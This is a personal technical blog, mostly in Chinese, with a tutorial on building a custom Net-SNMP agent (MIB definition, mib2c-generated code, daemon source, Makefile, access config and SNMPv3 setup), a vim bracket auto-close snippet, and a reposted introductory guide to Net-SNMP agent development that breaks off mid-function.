Border's English Blog

Efficient C Tips

borderj@gmail.com (Bian Jiang) — Fri, 25 Sep 2009 06:12:00 +0000

efficient C for an embedded target

in reference to: Stack Overflow: Efficient C Tips #1 - Choosing the correct integer size (view on Google Sidewiki)

[ SNMP ] Develop NetSnmp Extending agent

borderj@gmail.com (Border) — Wed, 05 Nov 2008 09:17:00 +0000

1. mib 库文件 BVCOM-SYSTEMUPTIME-MIB.txt
BVCOM-SYSTEMUPTIME-MIB DEFINITIONS ::= BEGIN

IMPORTS
TimeTicks FROM SNMPv2-SMI
enterprises FROM SNMPv2-SMI
OBJECT-TYPE, Integer32, MODULE-IDENTITY FROM SNMPv2-SMI;

bvcom OBJECT IDENTIFIER ::= { enterprises 26814 }

ipq6800 OBJECT IDENTIFIER ::= { bvcom 6800 }

bvcomAgentModules OBJECT IDENTIFIER ::= { ipq6800 1 }

bvcomAgentModuleObject OBJECT-TYPE
SYNTAX Integer32
MAX-ACCESS read-write
STATUS current
DESCRIPTION
"This is an object that simply supports a writable integer
when compiled into the agent. See
http://www.net-snmp.org/tutorial-5/toolkit/XXX for further
implementation details."
DEFVAL { 1 }
::= { bvcomAgentModules 1 }

bvcomAgentSubagentObject OBJECT-TYPE
SYNTAX Integer32
MAX-ACCESS read-write
STATUS current
DESCRIPTION
"This is an object that simply supports a writable integer
when attached to the agent. The object should be accessible
when the agentx subagent containing this object is attached.
See http://www.net-snmp.org/tutorial-5/toolkit/XXX for
further implementation details."
DEFVAL { 2 }
::= { bvcomAgentModules 2 }

bvcomAgentPluginObject OBJECT-TYPE
SYNTAX Integer32
MAX-ACCESS read-write
STATUS current
DESCRIPTION
"This is an object that simply supports a writable integer
when attached to the agent. This object should be accessible
when the dynamic plugin has been loaded into the agent. See
http://www.net-snmp.org/tutorial-5/toolkit/XXX for further
implementation details."
DEFVAL { 3 }
::= { bvcomAgentModules 3 }

END

2. 复制mib库文件到/usr/local/share/snmp/mibs/
sudo cp BVCOM-SYSTEMUPTIME-MIB.txt /usr/local/share/snmp/mibs/

3. 加载mib库
cat /usr/local/share/snmp/snmp.conf
mibs +BVCOM-SYSTEMUPTIME-MIB

4. 检查mib是否正常加载
border@debian:/work/border/snmp/example-demon$ snmptranslate -IR -Tp bvcom
+--bvcom(26814)
|
+--ipq6800(6800)
|
+--bvcomAgentModules(1)
|
+-- -RW- Integer32 bvcomAgentModuleObject(1)
+-- -RW- Integer32 bvcomAgentSubagentObject(2)
+-- -RW- Integer32 bvcomAgentPluginObject(3)

5. 查看mib2c支持的模板
border@debian:/work/border/snmp/example-demon$ ls /usr/local/share/snmp/
mib2c.access_functions.conf mib2c.create-dataset.conf mib2c.scalar.conf
mib2c.array-user.conf mib2c-data mib2c.table_data.conf
mib2c.check_values.conf mib2c.genhtml.conf mibs
mib2c.check_values_local.conf mib2c.int_watch.conf snmp.conf
mib2c.column_defines.conf mib2c.iterate_access.conf snmp.conf~
mib2c.column_enums.conf mib2c.iterate.conf snmpconf-data
mib2c.column_storage.conf mib2c.mfd.conf snmpd.conf
mib2c.conf mib2c.notify.conf snmp_perl.pl
mib2c.container.conf mib2c.old-api.conf snmp_perl_trapd.pl

6. 通过模板生成.c 和 .h 文件
border@debian:/work/border/snmp/example-demon$ mib2c -c mib2c.int_watch.conf bvcomAgentModules
writing to -
*** Warning: only generating code for nodes of MIB type INTEGER
writing to bvcomAgentModules.h
writing to bvcomAgentModules.c
running indent on bvcomAgentModules.c
running indent on bvcomAgentModules.h

7. 通过 snmp_agent_api 编写守护程序 example-demon.c

#include
#include
#include
#include
#include "bvcomAgentModules.h"

static int keep_running;

RETSIGTYPE
stop_server(int a) {
keep_running = 0;
}

int
main (int argc, char **argv) {

int agentx_subagent=0; /* change this if you want to be a SNMP master agent */
int background = 0; /* change this if you want to run in the background */
int syslog = 0; /* change this if you want to use syslog */

/* print log errors to syslog or stderr */

if (syslog)
snmp_enable_calllog();
else
snmp_enable_stderrlog();

/* we're an agentx subagent? */
if (agentx_subagent) {
/* make us a agentx client. */
netsnmp_ds_set_boolean(NETSNMP_DS_APPLICATION_ID, NETSNMP_DS_AGENT_ROLE, 1);
}

/* run in background, if requested */
if (background && netsnmp_daemonize(1, !syslog))
exit(1);

/* Initialize tcpip, if necessary */
SOCK_STARTUP;

/* Initialize the agent library */
init_agent("example-demon"); // 配置文件名

/* Initialize our mib code here */
printf("Before init bvcomAgentModules \n");

init_bvcomAgentModules(); // 加载节点信息

printf("End init bvcomAgentModules \n");

/* initialize vacm/usm access control */
if (!agentx_subagent) {
void init_vacm_vars();
void init_usmUser();
}

/* Example-demon will be used to read example-demon.conf files. */
init_snmp("example-demon");

/* If we're going to be a snmp master agent, initial the ports */
if (!agentx_subagent)
init_master_agent(); /* open the port to listen on (defaults to udp:161) */

printf("---------------------\n");
/* In case we recevie a request to stop (kill -TERM or kill -INT) */
keep_running = 1;
signal(SIGTERM, stop_server);

signal(SIGINT, stop_server);

snmp_log(LOG_INFO,"example-demon is up and running.\n");

/* your main loop here... */
while(keep_running) {
/* if you use select(), see snmp_select_info() in snmp_api(3) */
/* --- OR --- */
agent_check_and_process(1); /* 0 == don't block */

}

/* at shutdown time */
snmp_shutdown("example-demon");
SOCK_CLEANUP;
return 0;
}

8. Makefile

CC=gcc

OBJS2=example-demon.o bvcomAgentModules.o
TARGETS=example-demon

CFLAGS=-I. `net-snmp-config --cflags`
BUILDLIBS=`net-snmp-config --libs`
BUILDAGENTLIBS=`net-snmp-config --agent-libs`

# shared library flags (assumes gcc)
DLFLAGS=-fPIC -shared

all: $(TARGETS)

example-demon: $(OBJS2)
$(CC) -o example-demon $(OBJS2) $(BUILDAGENTLIBS)

clean:
rm $(OBJS2) $(OBJS2) $(TARGETS)

9. example-demon.conf

###############################################################################
# Access Control
###############################################################################

# sec.name source community
com2sec local localhost public
com2sec mynetwork 192.168.0.0/24 public

####
# Second, map the security names into group names:

# sec.model sec.name
group MyRWGroup v1 local
group MyRWGroup v2c local
group MyRWGroup usm local
group MyROGroup v1 mynetwork
group MyROGroup v2c mynetwork
group MyROGroup usm mynetwork

####
# Third, create a view for us to let the groups have rights to:

# incl/excl subtree mask
view all included .1 80

####
# Finally, grant the 2 groups access to the 1 view with different
# write permissions:

# context sec.model sec.level match read write notif
access MyROGroup "" any noauth exact all none none
access MyRWGroup "" any noauth exact all all none

agentaddress 161

10. 运行example-demon 时要用超级管理员运行，不然会出错。
sudo ./example-demon

a. 没有用超级管理员时，报的错误：
border@debian:/work/border/snmp/example-demon$ ./example-demon
netsnmp_assert !"registration != duplicate" failed agent_registry.c:535 netsnmp_subtree_load()
netsnmp_assert !"registration != duplicate" failed agent_registry.c:535 netsnmp_subtree_load()
netsnmp_assert !"registration != duplicate" failed agent_registry.c:535 netsnmp_subtree_load()
Before init bvcomAgentModules
End init bvcomAgentModules
Error opening specified endpoint "161"
---------------------
example-demon is up and running.
read_config_store open failure on /var/net-snmp/example-demon.conf
read_config_store open failure on /var/net-snmp/example-demon.conf
read_config_store open failure on /var/net-snmp/example-demon.conf

b. 如果报Error opening specified endpoint ""错，说明example-demon.conf配置文件没有agentaddress 161

11. 拷贝配置文件到 ~/.snmp/目录下
cp example-demon.conf /home/border/.snmp/

12. sudo ./example-demon

border@debian:~$ snmpwalk -v1 -c public localhost bvcom
BVCOM-SYSTEMUPTIME-MIB::bvcomAgentModuleObject.0 = INTEGER: 68001
BVCOM-SYSTEMUPTIME-MIB::bvcomAgentSubagentObject.0 = INTEGER: 68002
BVCOM-SYSTEMUPTIME-MIB::bvcomAgentPluginObject.0 = INTEGER: 68003
End of MIB

border@debian:~$ snmpget -v1 -c public localhost bvcomAgentModuleObject.0
BVCOM-SYSTEMUPTIME-MIB::bvcomAgentModuleObject.0 = INTEGER: 68001

border@debian:~$ snmpgetnext -v1 -c public localhost bvcomAgentModuleObject.0
BVCOM-SYSTEMUPTIME-MIB::bvcomAgentSubagentObject.0 = INTEGER: 68002

13. 支持snmpv3 在配置文件中增加
rwuser border
rwuser border1
createUser border MD5 "bvcombjbj" DES
createUser border1 SHA "bvcombjbj" AES
(最后一行也可以这样写：createUser border1 SHA "bvcombjbj" AES128)

通过如下命令验证:
a. 验证MD5
snmpwalk -v3 -l authPriv -u border -A bvcombjbj -X bvcombjbj localhost bvcom
BVCOM-SYSTEMUPTIME-MIB::bvcomAgentModuleObject.0 = INTEGER: 68001
BVCOM-SYSTEMUPTIME-MIB::bvcomAgentSubagentObject.0 = INTEGER: 68002
BVCOM-SYSTEMUPTIME-MIB::bvcomAgentPluginObject.0 = INTEGER: 68003
BVCOM-SYSTEMUPTIME-MIB::bvcomAgentPluginObject.0 = No more variables left in this MIB View (It is past the end of the MIB tree)

b. 验证SHA
snmpwalk -v3 -l authPriv -u border1 -a SHA -x AES -A bvcombjbj -X bvcombjbj localhost bvcom
BVCOM-SYSTEMUPTIME-MIB::bvcomAgentModuleObject.0 = INTEGER: 68001
BVCOM-SYSTEMUPTIME-MIB::bvcomAgentSubagentObject.0 = INTEGER: 68002
BVCOM-SYSTEMUPTIME-MIB::bvcomAgentPluginObject.0 = INTEGER: 68003
BVCOM-SYSTEMUPTIME-MIB::bvcomAgentPluginObject.0 = No more variables left in this MIB View (It is past the end of the MIB tree)

如果你采用的是AES128,就需要把-x AES改为-x AES128：
snmpwalk -v3 -l authPriv -u border1 -a SHA -x AES128 -A bvcombjbj -X bvcombjbj localhost bvcom

参考:
1. 用NET-SNMP软件包开发简单客户端代理 http://b0rder.com/wiki/NetSnmp/NetSnmpSimpleAgentMib
2. snmpd.examples 配置信息相关 http://www.net-snmp.org/docs/man/snmpd.examples.html
3. snmp_agent_api http://www.net-snmp.org/docs/man/snmp_agent_api.html
4. Tutorial http://www.nwsmith.net/HintsTips/net-snmp-tutorial.htm

--
Bian Jiang
Blog: http://www.b0rder.com/
Mail: borderj {at} gmail.com

vim 括号自动补全

borderj@gmail.com (Border) — Fri, 26 Sep 2008 16:09:00 +0000

"---------------------------------------------------------------------------
" 括号自动补全
" http://www.linuxgem.org/tip/bracket-auto-closing-in-vim.html
"---------------------------------------------------------------------------
:inoremap ( ()i
:inoremap ) =ClosePair(')')
:inoremap { {}i
:inoremap } =ClosePair('}')
:inoremap [ []i
:inoremap ] =ClosePair(']')
:inoremap < <>i
:inoremap > =ClosePair('>')

function ClosePair(char)
 if getline('.')[col('.') - 1] == a:char
 return "\"
 else
 return a:char
 endif
endf

--
Jiang Bian
Blog: http://www.b0rder.com/
Mail: borderj {at} gmail.com

用 NET-SNMP 软件包开发简单客户端代理( Agent-mib)

borderj@gmail.com (Border) — Fri, 26 Sep 2008 09:57:00 +0000

用NET-SNMP软件包开发简单客户端代理

写在前面的话：

对于net-snmp我也是一个初学者，开始学习时也碰到了很多低级的问题。在很多论坛上（事实上比较少^_^, 建议大家直接去sourcefoge社区看关于net-snmp的mail-list），都没有比较初级入门的文章，本着开源学习的精神，把自己的一点收获，共享给大家。通过参考一些前辈的文章和帮助文档，本文实现了一个简单的mib，并编写了文档。本文主要面向初级学习者（我也是个菜鸟），欢迎大家留言讨论。

作者：solomoon
完成时间：2005-9-11
Email：lilofreeman@yahoo.com.cn
Web：http://bibu.blogchina.com

1 SNMP协议简介. 3
1.1 网络管理协议结构... 3
1.2 管理信息库... 4
1.3 SNMP的版本... 4
2 SNMP开发软件包. 5
2.1 NET-SNMP简介和安装... 5
2.2 NET-SNMP代理的配置... 5
2.3 NET-SNMP工具的使用... 6
3 扩展开发――代理. 7
3.1 NET-SNMP中的scalar对象和table对象... 7
3.2 NET-SNMP扩展代理的两种方式... 7
3.3 自定义MIB. 8
3.4 自定义MIB――简单变量的实现... 9
3.5 自定义MIB――表对象的实现... 11
3.5.1 mib.iterator.conf模版的实现... 11
3.5.2 mib.iterator_access.conf模版的实现... 16
3.6 代码的合并... 16
3.7 配置和运行... 16
4 开发中的问题与解决. 17
5 总结. 17
6 附录. 18
6.1 主函数foxmail_new.c. 18
6.2 简单变量实现代码... 20
6.2.1 display_time.c. 20
6.2.2 display_time.h. 22
6.3 表的实现... 22
6.3.1 ExampleTable.c. 22
6.3.2 ExampleTable.h. 31
6.3.3 ExampleTable_access.c. 31
6.3.4 ExampleTable_access.h. 40
6.3.5 ExampleTable_checkfns.c. 40
6.3.6 ExampleTable_checkfns.h. 41
6.3.7 ExampleTable_checkfns_local.c. 42
6.3.8 ExampleTable_checkfns_local.h. 43
6.3.9 ExampleTable_columns.h. 43
6.3.10 ExampleTable_enums.h. 44
6.4 自定义mib文件MyMib.txt 44

用NET-SNMP软件包开发简单客户端代理
1 SNMP协议简介

作为一个完备的系统，必须有一套反馈机制来调整系统的运行。简单网络管理协议产生的目的，就是为了使松散的网络更加有效地运行。它广泛的应用于监测网络的状态、网络设备的运行情况、各种电脑设备以及一些辅助的外围设备，使得网络管理员通过对节点的查询和设置，发现并定位故障，进而采取相应措施维护网络。网络管理的研究已经发展了许多年，对于日益纷繁的需求，简捷性和扩展性仍是研究的主题。本文档的目的是关于客户端代理的开发，不是对协议发展的探讨。本文中协议相关资料可以参考RFC文档：

RFC1155：Structure and Identification of Management Information for TCP/IP-based

Internets

RFC1157： SNMP

RFC1212： Concise MIB Definitions

RFC1215： A Convention for Defining Traps

RFC1905： Protocol Operations for SNMPv2

RFC2011： SNMPv2 Management Information Base for the Internet Protocol using SMIv2

RFC2578： Structure of Management Information

RFC2579： Textual Conventions

RFC2580： Conformance Statements
1.1 网络管理协议结构

SNMP的网络管理模型包括以下关键元素：管理端、代理端、管理信息库、网络管理协议。它基于tcp/ip协议，属于应用层协议，通过udp协议通信。管理端与代理端的通信原语包括：Get,Getnext,Set,Trap。对应这些命令相应的SNMP结构框架实现如图1所示

图1. SNMP实现结构图

从上图我们可以看到协议，消息传递方式等。另外，在udp数据包中，发送信息是按ASN.1自解释方式编码的。但对于许多小型被监管设备，可能会运行不同协议，或者运行完整代理花费很大，于是产生了代管设备，主代理和子代理的概念。在小型设备上运行子代理，把数据发给主代理来完成snmp协议的通信。
1.2 管理信息库

SNMP以MIB（管理信息结构）为基础来描述被监管资源，由此建立的数据集和称之为MIB

库。它是一种树型结构的数据库，被监管的对象都处于叶子节点上。每个被监管对象都由一个唯一的对象标识符来识别。对象信息的存储结构由MIB定义的简单变量和表来构造，它一般包含描述名（对象标识符）、数据类型、读写规则、功能描述、状态。MIB的定义可以查询RFC1155，它定义了四种基本数据类型：INTEGER，OCTET STRING，OBJECT IDENTIFIER和NULL。由这四种基本类型通过SEQUENCE构造列和表，以及新类型如：NetworkAddress、IpAddress、Counter、Gauge、TimeTicks、Opaque等，以及宏定义。当然，根据需要还可以构造自己的数据类型。
1.3 SNMP的版本

目前SNMP有三个版本snmpV1、snmpV2、snmpV3。针对原始的V1版，93版的v2加入了安全机制，但用户对其并不感兴趣，在96版的v2中又删除了安全机制，99年开始酝酿的v3版开始提出一个snmp的统一架构，采用User-based安全模型和View-based访问控制模型提供SNMP网络管理的安全性。安全机制是SNMPv3的最具特色的内容。
2 SNMP开发软件包

目前，开发SNMP的软件包有许多可以选择如SNMP++、AGENT++、NET-SNMP等。这里我们选用的是NET-SNMP。首先它是一个开源软件，其次基于C语言开发，便于移植。ucd-snmp源自于卡耐基.梅隆大学的SNMP软件包CMU snmp 2.1.2.1, 由加州大学Davis分校(University of California at Davis)开发与维护, 所以命名为ucd-snmp。2000年11月ucd-snmp项目转到由SourceForge(www.sourceforge.net)管理, 并更名为net-snmp。
2.1 NET-SNMP简介和安装

net-snmp早先是在Unix平台下开发的。现可以移植到：

* HP-UX (10.20 to 9.01 and 11.0)

* Ultrix (4.5 to 4.2)

* Solaris SPARC/ULTRA (2.8 to 2.3), Intel (2.9) and SunOS (4.1.4 to 4.1.2)

* OSF (4.0, 3.2)

* NetBSD (1.5alpha to 1.0)

* FreeBSD (4.1 to 2.2)

* BSDi (4.0.1 to 2.1)

* Linux (kernels 2.4 to 1.3)

* AIX (4.1.5, 3.2.5)

* OpenBSD (2.8, 2.6)

* Irix (6.5 to 5.1)

* OS X (10.1.1 and 10.1.2)

* Dynix/PTX 4.4

* QNX 6.2.1A

* Windows

等多个平台。Net-snmp是一个代理端软件，但也提供管理端的查询工具。安装有两种方式：一是直接安装的二进制包，二是需要编译的源代码。我们在windows平台上安装的二进制包，在虚拟Unix平台CygWin上编译安装的源代码。在CygWin中，按照常规的configure, make ,make install三个步骤就可成功编译安装源代码。在windows上的二进制包的安装就非常简单了，只需按提示就可完成。源代码和二进制包可从www.net-snmp.org网站下载，本文中所用的是net-snmp5.2.1.2的版本。之所以要先安装一个可运行的net-snmp系统，是因为我们开发程序运行环境的配置文件，是按照默认安装路径内部设定搜索的；另外，还可以利用其提供的配置工具来生成配置文件，利用提供的查询工具来测试程序。
2.2 NET-SNMP代理的配置

运行net-snmp之前先要进行环境设置，否则无法查询到结果。环境配置文件由snmpconf命令交互生成。运行snmpconf后，提示有三个配置文件：snmpd.conf，snmptraps.conf，snmp.conf。其中，snmpd.conf用来配置代理和管理端通信时的参数，只需设置两个参数就可正常运行程序了，一是community name，有只读rocommunity和读写rwcommunity之分，相当于访问账号，这里设rocommunity为public；另一个是访问端口，设为snmp协议默认的161端口。 Snmp.conf是与mib库设置相关的配置文件。Snmptraps.conf用来设置代理陷阱，本文没有讨论陷阱。配置文件可以放在三个地方，一是盘符根目录下，二是~\usr\etc\snmp目录下，三是~\usr\snmp\persist，按标准路径最好是第二种方式。

另外，snmpconf和mib2c工具都是基于perl脚本的，在windows下需要安装perl才能运行。按照帮助文档的提示，下载ActivePerl安装。并按照帮助文档中perl的安装要求，下载在win32环境下所需的其他组件，配置并测试perl模块，使snmpconf和mib2c能正常运行。
2.3 NET-SNMP工具的使用

当环境设置好后，运行snmpd.exe，即snmp代理进程，就可以使用管理工具查询其中的信息了。Net-snmp提供的查询工具有很多，这里只介绍常用的几个，而且大部分查询命令的格式都大同小异。这里以.iso.org.dod.internet.mgmt.mib-2.system为例，其Oid为：.1.3.6.1.2.1.1。结构如下：

………system .1.3.6.1.2.1.1

|――sysDescr .1.3.6.1.2.1.1.1

|――sysObjectID .1.3.6.1.2.1.1.2

……

1) snmpget.exe――snmpget [OPTIONS] AGENT OID [OID]...用来查询叶子节点

实例：snmpget �Cv2c �Cc public localhost .1.3.6.1.2.1.1.5.0

-v2c：使用的是2c的snmp版本，可选1|2c|3

-c public：community 名为public

localhost: 代理的地址，这里因为代理运行在本机上，所以可用localhost

.1.3…….0:这里查询的是.iso.org.dod.internet.mgmt.mib-2.system.sysName，其Oid为.1.3.6.1.2.1.1.5，使用这个命令使叶子节点要在后面加.0。

2） snmpgetnext.exe――snmpgetnext [OPTIONS] AGENT OID [OID]...通过父节点查询叶子节点

实例：snmpgetnext �Cv2c �Cc public localhost .1.3.6.1.2.1.1

这个命令假设不知道叶子节点，但知道父节点，则可遍历到第一个叶子节点。此例结果等同于上一个例子。Oid也可输入.1.3.6.1.2，因为它是按字典顺序遍历的。

3） snmptable.exe――snmptable [OPTIONS] AGENT TABLE-OID 用来查询表对象

实例：snmptable �Cv2c �Cc public localhost .1.3.6.1.2.1.4.20

这个命令查询表对象，本例中查询的是.iso.org.dod.internet.mgmt.mib-2.ip.ipAddrTable

4）snmpset.exe――snmpset [OPTIONS] AGENT OID TYPE VALUE [OID TYPE VALUE]...修改数据

实例：snmpset �Cv2c �Cc public localhost .1.3.6.1.2.1.4.21.1.3.x i 99

x：在这里是索引值，表示表项中某一列的第几个数据,根据要求设定

i: 这里是列数据类型，包括i: INTEGER, u: unsigned INTEGER, t: TIMETICKS,

a: IPADDRESS o: OBJID, s: STRING, x: HEX STRING,

d: DECIMAL STRING, b: BITS U: unsigned int64,

I: signed int64, F: float, D: double

5） mib2c 用来把mib库文件编译成.c和.h模版。具体使用在下面章节的应用中介绍
3 扩展开发――代理

当系统加入了新设备，或设备配置发生了变化等，需要实现新的mib模块，这时就需要扩展代理端了。在利用net-snmp做扩展之前的准备工作是，一下载源代码net-snmp5.2.1.2，二编译出库文件：netsnmpagent.lib、netsnmphelpers.lib、netsnmpmibs.lib、netsnmp.lib。这四个库的工程文件都位于~\net-snmp-5.2.1.2\win32\下对应的文件夹中。编译库文件时注意把netsnmp.lib放到最后编译，它可能会参考一下前面的编译文件。对于其他进一步的应用和开发请参考帮助文档编译和使用其他的工具；本文档中实现的代理程序，在源代码包中只需要引用这四个库文件。

开发工具VC6.0的环境设置也需要注意，参考帮助文档readme.win32，设置好include目录，library目录。在project\configure的选项link的相关栏目中添加上四个库文件，还要加上wsock32.lib库。另外，在程序编译过程中会碰到与VC的默认库相冲突的地方，按提示在上述添加库的地方加上/NODEFAULTLIB:XXX.LIB来除去默认库。

代理的开发过程基本上遵循：mib模块à转换成C文件à编译进代理中。
3.1 NET-SNMP中的scalar对象和table对象

mib模块一般都由变量和表组成。因此Net-snmp把SMI中的对象分为两大类：scalar和table。Scalar就包含我们常用的整型，字符串，时间等等数据类型。table就是scalar的一种集合，有一个和多个列组成，类似于数据库中的表。它必须具有索引项，用来按一定顺序检索表项。

Mib2工具通过模版把mib文件解析成.c和.h文件，这些文件仅仅是半成品，还需要手工在相应地方添加相应代码。Mib2c有很多模版，可以根据相应需要来调用不同的模版。但mib2c目前不支持同时解析scalar和table 对象，对于具有这两种对象的mib模块，需要分别生成代码文件，然后再合并成整体。
3.2 NET-SNMP扩展代理的两种方式

用net-snmp扩展代理，实现方式可归结为两种：一是静态库方式，通过修改配置头文件，在相应地方包含新引入的mib模块的.c和.h文件，然后重新编译库文件和代理程序；二是编译动态共享库，只需把新引入的mib模块的.c和.h文件编译成动态库，通过设置能够让代理程序载入。

对于第二种方式，一需要编译成.so动态共享库，二需要原代理程序是否包含dlmod或load命令，三还要看系统是否支持。一般情况下仅支持Unix平台。我们在CygWin下试验过Unix平台编译。在VC下的编译环境，基本上都是参考其makefile,configure等文件。

因为是在windows平台下开发，本文档采用的是第一种方式。这种方式允许我们在原有mib库上添加新的mib模块，也可以只针对需要的mib模块编译单独的程序。

源代码包中的代理程序工程文件位于~\ net-snmp-5.2.1.2\win32\snmpd下，因为它可移植到多个平台，主程序代码中有许多平台开关，和各种选项，非常庞大。为了简化开发和调试，我们使用了一个帮助文档中介绍的简化的代理端程序框架。这个框架非常精简，在性能上可能比原版差很多，但用来测试和开发mib库就比较高效了。程序的运行机制：程序启动，载入初始化mib模块，然后进入一个等待呼叫的无限循环，代码片段如下：

… …

init_MyMib();

… …

while(keep_running)

{

/* if you use select(), see snmp_select_info() in snmp_api(3) */

/* --- OR --- */

agent_check_and_process(1); /* 0 == don't block */

}

我们所要做的就是实现init_MyMib()函数，即自定义的mib模块。关于无限循环中的阻塞与否，根据mib模块而定。如果你的应用程序需要以非阻塞方式处理SNMP数据流，就使用一步接口（例如GUI、线程、forking等）。否则，只需要使用同步接口就可以了。在阻塞模式下，程序会占用大量cpu资源。具体实现，参见附录5.1。下面从mib库开始。
3.3 自定义MIB

这里我们定义了一个私人节点的MIB，位于节点.iso.org.dod.internet. private.enterprises.foxmail下，数字Oid为：.1.3.6.1.4.1.310。树型结构如下：

foxmail .1.3.6.1.4.1.310

|----SecondCounter .1.3.6.1.4.1.310.1

|----WeekTime .1.3.6.1.4.1.310.2

+----ExampleTable .1.3.6.1.4.1.310.3

+----ExampleEntry .1.3.6.1.4.1.310.3.1

|----UserIndex .1.3.6.1.4.1.310.3.1.1

|----UserStatus .1.3.6.1.4.1.310.3.1.2

|----CheckTime .1.3.6.1.4.1.310.3.1.3

|----MonSet .1.3.6.1.4.1.310.3.1.4

在这个MIB中，定义了两个简单变量SecondCounter:整型，WeekTime:时间类型；还定义了一个表对象ExampleTable,其中UserIndex为索引：整型，UserStatus:字符串，CheckTime:时间类型，以上三个都是只读，MonSet为读写变量：整型。参见附录5.4
3.4 自定义MIB――简单变量的实现

把自定义的MIB命名为MyMib.txt,参照上面章节，放到net-snmp二进制安装路径~\usr\share\snmp\mibs下。配置snmp.conf文件，加入新的库MyMib.txt，语法为MIBS=+MyMib，这样才能让系统搜索到。然后在CMD提示符下输入：mib2c SecondCounter选择生成net-snmp版的代码。就会生成SecondCounter.c和SecondCounter.h文件，同样可以产生WeekTime.c和WeekTime.h文件。

由模版生成的文件，不论是简单变量还是表对象，其整体结构都是固定模式。在模版头文件中对节点进行宏定义，函数声明。在模版实现文件中，分为两大块：一是初始化函数，主要用来对变量注册；二是响应函数，用来响应管理端的查询命令，响应函数的返回值，就是我们要手工实现的。我们所要做的工作就是把数据以一种合理的方式导入到其中。

模版是针对单个变量来处理的：

1）初始化：

init_SecondCounter(void)

{

static oid SecondCounter_oid[] = { 1,3,6,1,4,1,310,1 };

DEBUGMSGTL(("SecondCounter", "Initializing\n"));

netsnmp_register_scalar(netsnmp_create_handler_registration("SecondCounter", handle_SecondCounter, SecondCounter_oid, OID_LENGTH(SecondCounter_oid),HANDLER_CAN_RWRITE

));

}

如果有多个变量就要注册多次。

2）处理响应函数

handle_SecondCounter(netsnmp_mib_handler *handler,

netsnmp_handler_registration *reginfo,

netsnmp_agent_request_info *reqinfo,

netsnmp_request_info *requests)

其实现主要为：

switch(reqinfo->mode) {

case MODE_GET:

snmp_set_var_typed_value(requests->requestvb, ASN_INTEGER,

(u_char *) /* XXX: a pointer to the scalar's data */,

/* XXX: the length of the data in bytes */);

如果有多个变量，就要简单重复switch语句，因为switch只提供了通信原语的选择，变量的选择依赖各自的处理句柄函数。

显然这两套代码如果合并起来就显得冗余了，因为很多地方可以共用一套代码。在这里参考源代码包~\net-snmp-5.2.1.2\agent\mibgroup\examples下的example.c和example.h文件合并我们的MIB。

主要实现方式是：

1）通过一种变量数组，把MIB中的变量列举出来，代码片断如下：

struct variable2 foxmail_variables[] =

{

{FoxmailINT,ASN_INTEGER,RONLY,var_foxmail,1,{1}},

{FoxmailTIMETICKS, ASN_TIMETICKS, RONLY, var_foxmail, 1, {2}}

/*… … …加入其他的变量… … … */

};

结构体variable2的定义如下:

struct variable2 {

u_char magic; /* passed to function as a hint */

u_char type; /* type of variable */

u_short acl; /* access control list for variable */

FindVarMethod *findVar; /* function that finds variable */

u_char namelen; /* length of name below */

oid name[2]; /* object identifier of variable */

};

通过上面代码，可以看出，数组对每个变量都一一说明了变量类型、节点位置、读写状态、实现函数等。

2）然后再对变量数组进行注册初始化：

REGISTER_MIB("foxmail", foxmail_variables, variable2, foxmail_variables_oid);

3）从数组可知实现函数为var_foxmail();其原型为：

u_char * var_foxmail(struct variable *vp,

oid * name,

size_t * length,

int exact, size_t * var_len, WriteMethod ** write_method)

它通过一个switch语句来选择响应变量，代码片断如下：

switch (vp->magic) {

case FoxmailINT: /*这里为数组中的索引值*/

long_ret=XXX; /*XXX为返回值，这里可以用指针来引入内部或外部数据*/

/* *write_method=write_foxmailINT 如果是可以set的变量，需调用写函数*/

return (u_char *) & long_ret;

case FoxmailTIMETICKS:

… … …

}

总之，这种方法比较紧凑有效，完整代码参见附录5.2
3.5 自定义MIB――表对象的实现

为了更加有效的描述对象，引入表来把一系列相关的信息进行综合。因此表就由具有一个或多个变量的列组成。从实现方式和数据结构来看，表是一个结构体变量数组；从系统管理来看，就是数据库中的表单。从管理数据库的需求出发，就要求实现表单的插入、删除、恢复等基本功能，更高级的功能还应实现多个表的依赖关系、触发机制等。在底层实现上这些都要通过操纵结构体数组来完成。

Mib2c提供了表的生成模版。其目的之一是可以降低对SNMP知识的要求，二是分离请求中对数据的定位和响应中对数据的处理，使得实现上集中在对数据的处理上。因此它产生的模版主要由三个部分组成：一是数据结构，对请求数据的构造；二是数据检索，对请求数据的定位；三是操纵数据，对请求数据进行GET或SET。

不同的需求有不同的实现方式，mib2c根据表中导入数据的来源提供了两大类模版。

其分类按照运行mib2c时的交互信息：一类为数据相对代理处于外部，适合于监视和操纵外部数据的MIB，如从操作系统或其他系统的接口提取信息；并且表中的行的创建销毁，通常都独立于SNMP代理。第二类是数据为代理所有，代理对数据的操纵直接反映到数据源。

本文档只针对第一种类型实现表，且称之为外部方式。在mib2c进入外部方式，仍有三个模版，分别为：mib2c.iterate.conf，mib2c.iterate_access.conf，mib2c.mfd.conf；前两种方式基本一样，使用了helpers中一种叫iterator的API，特点是可以处理无序数据，但是效率较低，适合于小型数据存储，对内存、响应时间要求不是很严格的应用；后一种就很复杂了，它提供了更加细致的代码框架，通过多层交互，可以区分实时、半实时、永久型的数据，可以选择数据的存储方式，可以做列或表之间的依赖关系，数据结构的自动绑定或手工编辑，以及其他复杂的选项。我们只实现前两种较为简单的。
3.5.1 mib.iterator.conf模版的实现

首先，这个模版生成了Example.c和Example.h文件。在Example.c文件中包含下列函数和结构体，形参省略：

struct ExampleTable_entry；

void init_ExampleTable;

void initialize_table_ExampleTable;

Netsnmp_Node_Handler ExampleTable_handler;

Netsnmp_First_Data_Point ExampleTable_get_first_data_point;

Netsnmp_Next_Data_Point ExampleTable_get_next_data_point;

struct ExampleTable_entry *ExampleTable_createEntry；

void ExampleTable_removeEntry；

实现过程我们按数据结构，数据检索，数据操纵来说明函数的调用和处理过程。

1）结构体：

struct ExampleTable_entry {

/* Index values */ /*这个结构体把exampleTable中的*/

long UserIndex; /*变量都列举，并指明了索引变量 */

/*并有一个生成链表的next指针 */

/* Column values */

/* long UserIndex;*/ /*去掉重复 */

char UserStatus;

u_long CheckTime;

long MonSet;

long old_MonSet;

/* Illustrate using a simple linked list */

/* int valid;*/ /*没有用到的变量 */

struct ExampleTable_entry *next;

};

通过这个结构体，我们把从外部读入的数据做成一个链表，并把链表头地址传递给

ExampleTable_get_first_data_point;

ExampleTable_get_next_data_point;

用这两个函数遍历链表。

2）数据的检索：

数据的检索由ExampleTable_handler函数来完成，其原型为：

int ExampleTable_handler(

netsnmp_mib_handler *handler,

